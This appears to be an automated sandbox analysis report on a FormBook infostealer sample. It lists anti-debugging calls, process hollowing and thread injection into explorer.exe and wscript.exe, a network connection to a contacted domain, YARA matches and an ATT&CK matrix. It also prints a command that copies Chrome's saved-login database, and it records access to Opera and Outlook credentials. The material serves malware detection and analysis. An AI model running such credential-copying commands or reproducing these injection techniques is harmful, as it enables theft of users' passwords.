Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029835A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A1FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A1FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A1FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A1FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A08DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D6DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0296D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0296D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A28D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A1E539 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02984D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02984D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02984D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029DA537 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02977D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02993D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D3540 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A03D40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B0849B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB14FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B76CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B76CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B76CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BC8CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BC740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BC740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BC740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B76C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B76C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B76C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B76C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1746D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B8C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B8C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2A44B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B21DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B21DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B21DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BC05AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BC05AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B235A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04AF2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04AF2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04AF2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04AF2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04AF2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B22581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B22581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B22581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B22581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB2D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB2D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB2D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB2D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB2D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB2D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB2D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BA8DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B0D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B0D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BBFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BBFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BBFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BBFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B76DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B76DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B76DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B76DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B76DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B76DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B7A537 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BBE539 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\wscript.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_000E6217 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_000E572D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_000F3B93 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E52F79B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E5347B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E5301F3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 161.47.48.3 80
Source: C:\Windows\explorer.exe	Domain query: www.ordertds.com

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread register set: target process: 3388
Source: C:\Windows\SysWOW64\wscript.exe	Thread register set: target process: 3388

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe

Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: A30000

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V

Source: explorer.exe, 00000013.00000002.461744913.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 00000013.00000000.329272246.0000000001980000.00000002.00000001.sdmp, wscript.exe, 00000018.00000002.463458339.0000000003380000.00000002.00000001.sdmp, player-toolkit.exe, 0000001D.00000002.463658512.00000000013A0000.00000002.00000001.sdmp, player-toolkit.exe, 00000020.00000002.462945107.0000000001B20000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000013.00000000.329272246.0000000001980000.00000002.00000001.sdmp, wscript.exe, 00000018.00000002.463458339.0000000003380000.00000002.00000001.sdmp, player-toolkit.exe, 0000001D.00000002.463658512.00000000013A0000.00000002.00000001.sdmp, player-toolkit.exe, 00000020.00000002.462945107.0000000001B20000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000013.00000000.329272246.0000000001980000.00000002.00000001.sdmp, wscript.exe, 00000018.00000002.463458339.0000000003380000.00000002.00000001.sdmp, player-toolkit.exe, 0000001D.00000002.463658512.00000000013A0000.00000002.00000001.sdmp, player-toolkit.exe, 00000020.00000002.462945107.0000000001B20000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000013.00000000.329272246.0000000001980000.00000002.00000001.sdmp, wscript.exe, 00000018.00000002.463458339.0000000003380000.00000002.00000001.sdmp, player-toolkit.exe, 0000001D.00000002.463658512.00000000013A0000.00000002.00000001.sdmp, player-toolkit.exe, 00000020.00000002.462945107.0000000001B20000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe

Code function: 29_2_000E552B cpuid

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: GetLocaleInfoW,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: EnumSystemLocalesW,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: EnumSystemLocalesW,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: EnumSystemLocalesW,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: EnumSystemLocalesW,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: GetLocaleInfoW,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: EnumSystemLocalesW,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: EnumSystemLocalesW,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: GetLocaleInfoW,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: EnumSystemLocalesW,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: EnumSystemLocalesW,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: GetLocaleInfoW,

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe

Code function: 29_2_00040400 GetSystemTimeAsFileTime,

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe

Code function: 29_2_00100124 _free,_free,_free,GetTimeZoneInformation,_free,

Source: C:\Users\user\Desktop\focus.exe

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf, type: DROPPED
Source: Yara match	File source: 2.2.player-toolkit.exe.10000.0.unpack, type: UNPACKEDPE

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\SysWOW64\wscript.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf, type: DROPPED
Source: Yara match	File source: 2.2.player-toolkit.exe.10000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Registry Run Keys / Startup Folder1	Access Token Manipulation1	Deobfuscate/Decode Files or Information1	OS Credential Dumping1	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
